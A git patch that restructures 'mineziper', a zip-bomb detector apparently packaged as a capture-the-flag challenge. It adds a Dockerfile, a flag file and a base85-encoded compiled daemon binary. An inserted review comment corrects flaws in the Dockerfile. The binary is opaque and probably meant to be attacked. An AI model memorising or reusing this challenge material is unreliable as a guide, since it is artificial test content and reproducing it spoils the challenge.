From 81b8cd5c94ef863a7a99d318870a5d6da29f0122 Mon Sep 17 00:00:00 2001 
From: atxr Date: Fri, 1 Mar 2024 10:45:54 +0100 Subject: [PATCH 01/10] Refactor project --- Dockerfile | 20 ++++++++++++++++++ README.md | 4 ---- dist/mineziperd | Bin 0 -> 54688 bytes flag.txt | 1 + .../mineziper/CMakeLists.txt | 0 src/mineziper/README.md | 4 ++++ .../mineziper/libmineziper}/CMakeLists.txt | 0 .../libmineziper}/include/libmineziper.h | 0 .../include/libmineziper_bitstream.h | 0 .../include/libmineziper_crypto.h | 0 .../include/libmineziper_huffman_tree.h | 0 .../libmineziper}/include/libmineziper_zip.h | 0 .../libmineziper}/src/libmineziper.c | 0 .../src/libmineziper_bitstream.c | 0 .../libmineziper}/src/libmineziper_crypto.c | 0 .../src/libmineziper_huffman_tree.c | 0 .../libmineziper}/src/libmineziper_zip.c | 0 .../mineziper/mineziper}/CMakeLists.txt | 0 .../mineziper/mineziper}/mineziper.c | 0 .../mineziper/mineziper}/mineziperd.c | 0 {tests => src/mineziper/tests}/CMakeLists.txt | 0 .../mineziper/tests}/test_decode_fixed_tree.c | 0 .../tests}/test_decode_huffman_tree.c | 0 {tests => src/mineziper/tests}/test_get_cdh.c | 0 {webapp => src/webapp}/app.py | 0 {webapp => src/webapp}/static/space.jpg | Bin {webapp => src/webapp}/static/styles.css | 0 {webapp => src/webapp}/templates/index.html | 0 28 files changed, 25 insertions(+), 4 deletions(-) create mode 100644 Dockerfile create mode 100755 dist/mineziperd create mode 100644 flag.txt rename CMakeLists.txt => src/mineziper/CMakeLists.txt (100%) create mode 100644 src/mineziper/README.md rename {libmineziper => src/mineziper/libmineziper}/CMakeLists.txt (100%) rename {libmineziper => src/mineziper/libmineziper}/include/libmineziper.h (100%) rename {libmineziper => src/mineziper/libmineziper}/include/libmineziper_bitstream.h (100%) rename {libmineziper => src/mineziper/libmineziper}/include/libmineziper_crypto.h (100%) rename {libmineziper => src/mineziper/libmineziper}/include/libmineziper_huffman_tree.h (100%) rename {libmineziper => src/mineziper/libmineziper}/include/libmineziper_zip.h (100%) 
rename {libmineziper => src/mineziper/libmineziper}/src/libmineziper.c (100%) rename {libmineziper => src/mineziper/libmineziper}/src/libmineziper_bitstream.c (100%) rename {libmineziper => src/mineziper/libmineziper}/src/libmineziper_crypto.c (100%) rename {libmineziper => src/mineziper/libmineziper}/src/libmineziper_huffman_tree.c (100%) rename {libmineziper => src/mineziper/libmineziper}/src/libmineziper_zip.c (100%) rename {mineziper => src/mineziper/mineziper}/CMakeLists.txt (100%) rename {mineziper => src/mineziper/mineziper}/mineziper.c (100%) rename {mineziper => src/mineziper/mineziper}/mineziperd.c (100%) rename {tests => src/mineziper/tests}/CMakeLists.txt (100%) rename {tests => src/mineziper/tests}/test_decode_fixed_tree.c (100%) rename {tests => src/mineziper/tests}/test_decode_huffman_tree.c (100%) rename {tests => src/mineziper/tests}/test_get_cdh.c (100%) rename {webapp => src/webapp}/app.py (100%) rename {webapp => src/webapp}/static/space.jpg (100%) rename {webapp => src/webapp}/static/styles.css (100%) rename {webapp => src/webapp}/templates/index.html (100%)
diff --git a/Dockerfile b/Dockerfile
new file mode 100644
index 0000000..06d79ba
--- /dev/null
+++ b/Dockerfile
@@ -0,0 +1,20 @@
+FROM ubuntu:22.04
+
+RUN apt-get update
+
+RUN useradd -m -s /bin/bash user
+
+USER user
+WORKDIR /home/user
+
+COPY dist/mineziperd .
+COPY webapp .
+COPY flag.txt .
+
+RUN ./mineziperd &
+
+WORKDIR /home/user/webapp
+RUN pip install -r requirements.txt
+
+ENTRYPOINT [ "python3" ]
+CMD [ "app.py" ]
diff --git a/README.md b/README.md
index 8b01e2c..e69de29 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +0,0 @@
-# mineziper 💣
-### A Minesweeper for zip files!
-
-Detect zip bombs based on overlapping files.
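Review bot: `RUN ./mineziperd &` in the new Dockerfile starts the daemon only inside that build step, so no mineziperd process exists when the container actually runs. Two other steps look like they cannot succeed as written: `RUN apt-get update` installs nothing, so the stock ubuntu:22.04 image has neither `python3` nor `pip` for the later `RUN pip install` and the ENTRYPOINT, and `COPY webapp .` copies the directory's contents into /home/user (from a path this same commit renames to src/webapp), which leaves /home/user/webapp without app.py or requirements.txt. The sketch below installs the interpreter in the same layer as the index update, copies the web app into its own directory, and starts the daemon from the entrypoint in place of the ENTRYPOINT/CMD pair; whether the app expects the daemon on a particular address or working directory is not visible here and should be confirmed.

```dockerfile
FROM ubuntu:22.04

RUN apt-get update \
    && apt-get install -y --no-install-recommends python3 python3-pip \
    && rm -rf /var/lib/apt/lists/*

# … unchanged: useradd, USER, WORKDIR /home/user, COPY of mineziperd and flag.txt …
COPY src/webapp ./webapp

WORKDIR /home/user/webapp
RUN pip install --no-cache-dir -r requirements.txt

# Launch the daemon at container start; a RUN step only executes during the build.
ENTRYPOINT [ "/bin/sh", "-c", "/home/user/mineziperd & exec python3 app.py" ]
```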
diff --git a/dist/mineziperd b/dist/mineziperd new file mode 100755 index 0000000000000000000000000000000000000000..e5a94e1b8bd1c7dc97cc31f4918b1093e117ca36 GIT binary patch literal 54688 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 